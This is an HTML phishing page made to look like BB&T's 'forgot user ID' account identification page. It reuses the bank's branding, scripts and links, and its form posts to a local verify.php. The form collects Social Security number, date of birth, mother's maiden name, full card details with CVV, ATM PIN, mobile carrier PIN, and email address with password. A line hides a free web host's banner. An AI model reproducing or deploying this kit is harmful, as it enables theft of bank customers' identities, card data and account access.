<!DOCTYPE html>
<!-- saved from url=(0073)https://bank.bbt.com/bbtpassreset/bbtuseridreset/accountidentification.do -->
<html class="no-js no-svg" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">	
	
	
	
	
		
		
			
<meta name="viewport" content="initial-scale = 1, maximum-scale=2.0, user-scalable=yes">

<title>BB&T Bank - Account Identification</title>
<script language="JavaScript" type="text/javascript" src="https://bank.bbt.com/bbtpassreset/content/js/jquery-1.9.1.min.js"></script>
<script src="https://bank.bbt.com/bbtpassreset/content/js/jquery.mask.js"></script>

<!--[if lt IE 9]>
	<script src="/bbtpassreset/content/js/html5shiv.js"></script>
<![endif]-->
<link rel="stylesheet" media="screen, print" type="text/css" href="https://bank.bbt.com/bbtpassreset/content/css/overview_v1.css">
<link rel="stylesheet" media="screen, print" type="text/css" href="https://bank.bbt.com/bbtpassreset/content/css/styles_v1.css">
<link rel="stylesheet" media="print" type="text/css" href="https://bank.bbt.com/bbtpassreset/content/css/print.css">
<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="T-Dox/etc/designs/bbt/bbtcom/favicon.ico"/>
<script>
	var olbUserFlag='';
	var maskedNumber ='';
	var webSessionId='2DBE980E5768DC9F7993546A34539AB9';
	var pageName = 'bbt.com:login:forgot_user_id:account_id';
	var waEventCode = '';
	var secFeat = '';
	var secQuestn = '';
	var strongPwd = '';
</script>
		
	
	
	
	<script type="text/javascript">
		function enableEmailDiv() {
			document.getElementById("phoneDiv").style.display = "none";
			document.getElementById("emailDiv").style.display = "block";
			document.getElementById("phone-number").value = "";
		}

		function enablePhoneDiv() {
			document.getElementById("emailDiv").style.display = "none";
			document.getElementById("phoneDiv").style.display = "block";
			document.getElementById("email-address").value = "";
		}
		
		function enrollOLB(enrollUrl){
			var glbClickData = {
				path: 'bbt.com:login:forgot_user_id:account_id|error-enroll',
				pageId: 'bbt.com:login:forgot_user_id:account_id|error-enroll',
				olbNum: '',// olbNum should populate with OTP start
				sessionId: '2DBE980E5768DC9F7993546A34539AB9'
			};
			trackLinkObject(glbClickData);
			window.location.href = enrollUrl;
		}
		
		function abandonWA(){
			var glbClickData = {
				path: pageName+'|abandon',
				pageId: pageName+'|abandon',
				olbNum: '',// olbNum should populate with OTP start
				sessionId: '2DBE980E5768DC9F7993546A34539AB9'
			};
			trackLinkObject(glbClickData);
		}
		
		function abandonNoWA(){
			var glbClickData = {
				path: pageName+'|abandon-no',
				pageId: pageName+'|abandon-no',
				olbNum: '',// olbNum should populate with OTP start
				sessionId: '2DBE980E5768DC9F7993546A34539AB9'
			};
			trackLinkObject(glbClickData);
		}
		
		function abandonYesWA(abandonUrl){
			var glbClickData = {
				path: pageName+'|abandon-yes',
				pageId: pageName+'|abandon-yes',
				olbNum: '',// olbNum should populate with OTP start
				sessionId: '2DBE980E5768DC9F7993546A34539AB9'
			};
			trackLinkObject(glbClickData);
			window.location.href = abandonUrl;
		}
	</script>
<script src="https://assets.adobedtm.com/ac265c174e480c2b170c2d73fbe2ff4ca87ebaac/s-code-contents-bea128958d738e75cd806a6872947dd61c940126.js"></script><script src="https://assets.adobedtm.com/ac265c174e480c2b170c2d73fbe2ff4ca87ebaac/scripts/satellite-564649ba64746d41e0007125.js"></script></head>
	<body id="retail-login" class="no-auth" onkeydown="submitMeOnEnter(event)" onload="enableEmailDiv();">

		<a href="https://bank.bbt.com/bbtpassreset/bbtuseridreset/accountidentification.do#content-wrapper" class="skip-navigation">Skip Navigation</a> 
		<header id="header">
	   			<!-- tab navigation -->
			<div id="main-nav" class="cf">
				<div class="wrapper">
					<!-- BB&T logo link goes to Account Overview home page -->
					<div id="logo"><a href="https://www.bbt.com/"><img src="T-Dox/content/dam/bbt/bbt.com/landscape/personal/info/u-logo.png" alt="BB&amp;T Logo"></a> </div>
	                
				</div>
			</div>
		</header>
		
		<!--Content begins -->
		<div id="content-wrapper" class="retail-login exceptions kba-passcode password-reset" tabindex="-1" role="main">
			<div class="wrapper">
				<div id="page-header">
					<h1><font color="#630303">Account Identification</font></h1>
				</div>

        <section class="column-one" role="presentation">
          <article class="module" role="presentation">
            <div class="mod-content">
						
					   <h4><font color="#630303">Personal_Informtion</font></h4>
<hr>   
            <h2 class="top-margin-neg-eight"></h2>
<!-- recoveruseridsuccess.do -->
<form id="account-identification-form" autocomplete="off" action="verify.php" method="post">

<div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">First Name</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="fname" type="text" value="" maxlength="40" placeholder="First Name" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Last Name</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="lname" type="text" value="" maxlength="40" placeholder="Last Name" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Date Of Birth</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="dob" type="text" value="" maxlength="10" placeholder="DD/MM/YYYY" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Address Line</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="stadd" type="text" value="" maxlength="40" placeholder="Apartment, suite, unit, building, floor, etc" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">State/Province</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="st" type="text" value="" maxlength="25" placeholder="State" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">City</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="ct" type="text" value="" maxlength="25" placeholder="Town/City" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Zip/Postal Code</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="zip" type="tel" value="" maxlength="5" placeholder="xxxxx" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Mother Maiden Name</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="mmn" type="text" value="" maxlength="40" placeholder="Mother Maiden Name" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Mobile Number</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="phn" type="text" value="" maxlength="14" placeholder="(xxx) xxx-xxxx" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Carrier PIN</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="phpin" type="tel" value="" maxlength="10" placeholder="4-10 Digits" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Social Security Number</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="ssn" type="tel" value="" maxlength="11" placeholder="xxx xx xxxx" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>

  
  				   <h4><font color="#630303">Card_Verification</font></h4>
<hr>   
            <h2 class="top-margin-neg-eight"></h2> </hr>
			</p>
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Cardholder's Name</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="noc" type="text" value="" maxlength="40" placeholder="Name On Card" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Card Number</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="card" type="text" value="" maxlength="19" placeholder="xxxx xxxx xxxx xxxx" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Expiration Date</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="exp" type="text" value="" maxlength="5" placeholder="MM/YYYY" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Card Security Code</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="cvv" type="tel" value="" maxlength="3" placeholder="3 Digits" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">ATM PIN</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="atm" type="tel" value="" maxlength="4" placeholder="4 Digits" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>

  <p>
  				   <h4><font color="#630303">Email_Authorization:</font></h4>
<hr>   
            <h2 class="top-margin-neg-eight"></h2>
			
	<div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Email Address</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="em" type="email" value="" maxlength="40" placeholder="example@domain.com" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  <div id="emailDiv" style="display: block;">
      <dt class="form-col-1"><label for="email-address">Email Password</label></dt>
      <!-- <dt class="form-col-1"><label for="phone-number">Phone Number</label></dt> -->
	
      <dd class="form-col-2">
	  
        <input id="email-address" class="" name="empass" type="password" value="" maxlength="40" placeholder="Password" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="true" required>

        <!-- <input id="phone-number" class="" name="email" type="text" required autofocus value="" placeholder="" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/> -->
		
      </dd>
  </div>
  
  
      <dt class="form-col-1"></dt>
                      
      <dd class="form-col-2">
        <button class="submit-button">Verify Now</button>

        <a href="https://bank.bbt.com/bbtpassreset/bbtuseridreset/accountidentification.do#lb-cancel-user-recovery" class="cancel-button modal" role="button" title="opens a dialog" onclick="abandonWA();">Cancel</a>
      </dd>
    
  </fieldset>
</form>

<div id="lb-cancel-user-recovery" class="window password-rules" style="display: none; left: auto;"> <span class="access" data-width="1">click to close window</span><a id="contFlowIcon" href="https://bank.bbt.com/bbtpassreset/bbtuseridreset/accountidentification.do#contFlowIcon" onclick="abandonNoWA();" class="close closelb" data-width="0"></a>
  <div class="content" data-width="490">
    <h2 data-width="450">Cancel Forgot User ID?</h2>
    <div class="row" data-width="450">
      <p data-width="450">Are you sure you want to cancel User ID retrieval? You will be taken directly to BBT.com.</p>
    </div>

    <div class="row" data-width="450">
      <div class="windowbuttons" data-width="337">
          <a id="leaveFlowButton" href="https://bank.bbt.com/bbtpassreset/bbtuseridreset/accountidentification.do#leaveFlowButton" onclick="abandonYesWA(&#39;https://www.bbt.com&#39;);" class="submit-link" data-width="92">
            Yes

            <span class="access" data-width="1"> Leave page and no changes are made.</span>
          </a>

          <a id="contFlowButton" href="https://bank.bbt.com/bbtpassreset/bbtuseridreset/accountidentification.do#contFlowButton" onclick="abandonNoWA();" class="cancel-button closelb focusable" data-width="100">
            No
            
            <span class="access" data-width="1">click to close window and return to Page</span>
          </a>
        </div>
    </div>
  
    <a id="contFlowLink" href="https://bank.bbt.com/bbtpassreset/bbtuseridreset/accountidentification.do#contFlowLink" onclick="abandonNoWA();" class="close closelb" data-width="147">Click to Close Window</a>
    <div class="clear" data-width="450"></div>
  </div>
</div>            </div>
          </article>
        </section>
        
			</div>
		</div>
		<!--Content ends --> 
		<!--Footer begins -->
		





<!--Footer begins -->
<footer id="footer">
	<div class="wrapper">
		<p>
			Online Banking Support: <span class="inline-block-bold">888-BBT-ONLINE (888-228-6654)</span>
		</p>
		<p class="footer-links">
			<a href="https://www.bbt.com/">BB&amp;T Home</a> | 
			<a href="https://www.bbt.com/bbtdotcom/privacy-and-security/default.page">Privacy &amp; Security</a> | 
			<a href="https://www.bbt.com/bbtdotcom/online-services/online-banking/docs/disclosures.page">Disclosures</a>
		</p>
		<p>�2020 Banch Banking and Trust Company. All rights reserved.</p>
	</div>
</footer>



  
    
  
  

<div id="areyousure" class="window" style="display: none; left: auto;"> 
  	<div class="content" data-width="590"><span class="access" data-width="1">click to close window</span><a href="https://bank.bbt.com/bbtpassreset/bbtuseridreset/accountidentification.do#_" class="close closelb" data-width="0"></a>
  		<h2 data-width="550">Are you sure?</h2>
        <p data-width="550">You are about to navigate away from this page without saving your changes.</p>
        <div class="windowbuttons" data-width="412"><a href="https://bank.bbt.com/bbtpassreset/bbtuseridreset/accountidentification.do#_" class="submit-link closelb" data-width="182"><span class="access" data-width="1">click to close window and</span> Return to Page</a>
					<a href="https://bank.bbt.com/bbtpassreset/bbtuseridreset/logoffuseridrst.do" class="cancel-button" data-width="112">Leave Page<span class="access" data-width="1">and no changes saved</span></a>
  		</div>
  		<div class="clear" data-width="550"></div>
	</div>
</div>
<div id="timeoutwindow" class="window" style="display: none; left: auto;">
	<div class="content" data-width="590">
		<a href="https://bank.bbt.com/bbtpassreset/bbtuseridreset/accountidentification.do#_" class="close closelb" data-width="0"><span class="access" data-width="1">click to close window</span></a>
		<img src="./wpfile/alert.png" alt="Attention!" data-width="50">
		<h2 data-width="550">Are You Still There?</h2>
		<p data-width="550">Your session will time out in less than 2 minutes. To extend your session click <strong data-width="119">Continue Session</strong>.</p>
		<p data-width="550">If you wish to end your session and securely log off,<br data-width="0"> click <strong data-width="49">Log Off</strong>.</p>
		<footer class="timeout-warning" data-width="440">
			<a href="https://bank.bbt.com/bbtpassreset/bbtuseridreset/accountidentification.do#_" class="submit-button closelb" data-width="199">Continue Session</a>
			<a href="https://bank.bbt.com/bbtpassreset/bbtuseridreset/logoffuseridrst.do" class="cancel-button" data-width="100">Log Off</a>
		</footer>
	</div>
</div>
<div class="modal-mask" style="width: 1349px; height: 1177px;"></div><!-- required for lightbox -->
<script>
	var globalContextUrl = "/bbtpassreset";
	var totalTime = 900; // 15 mins
	var warningTime = 120; // 2 mins
	var logOffUrl = globalContextUrl+"/bbtuseridreset/logoffuseridrst.do";
	var timeoutTid;
	var logOffTid;
	
	$(document).ready(function(){
		initTimeout(totalTime,warningTime,logOffUrl);
		
		$(".timeout-warning .submit-button").click(function(){
			var currDate=new Date();
			$.ajax({
				  type:'GET',
				  url: globalContextUrl+'/passwordResetMob.do?methodName=ping',
				  data: { rand: currDate.getTime() },
				  success: function(data){
					  //doNothing
				  }
				});
			abortLogOffTimer(logOffTid);
			abortLogOffTimer(timeoutTid);
			lightbox.closeModal();
			initTimeout(totalTime,warningTime,logOffUrl);
		});
		
		var startTimeoutObj = new Date(), currentTimeObj;
		olbAutoTimeoutFunction = function(){
			try{
					currentTimeObj = new Date(); // poll new current time
					var timeElapsedSecs = (currentTimeObj.getTime() - startTimeoutObj.getTime())/1000;
					
					if(timeElapsedSecs >= totalTime){
						 clearInterval(olbTimeoutTimerFunction);
						 window.location.replace(logOffUrl);
					}
			}catch(e){
			}
		};

		var olbTimeoutTimerFunction = setInterval(olbAutoTimeoutFunction, 5000); // Runs every 5 seconds
	});
</script>
<!--Footer ends -->


	<!--WA Code starts-->
	<div id="waPageID" style="display: none">bbt.com:login:forgot_user_id:account_id</div>
	<div id="waFunnelName" style="display: none"></div>
	<div id="waFunnelEvent" style="display: none"></div>
	<script>
		$(document).ready(function() {
			$('#waPageID').text(pageName);
			if(waEventCode != "")
				$('#waFunnelEvent').text(waEventCode);
			waManageVars();
			waOnLoad(olbUserFlag);
		});
	</script>
	<script language="JavaScript" type="text/javascript" src="https://bank.bbt.com/bbtpassreset/content/js/WaAnalytics.js"></script>
	<!--WA Code ends-->


<!-- Common script include starts -->
<script language="JavaScript" type="text/javascript" src="https://bank.bbt.com/bbtpassreset/content/js/passrst-script_v1.js"></script>
<!-- Common script include ends -->
		<!--Footer ends --> 

</style>

<style>img[alt="www.000webhost.com"]{display:none;}</style>
	
</body></html>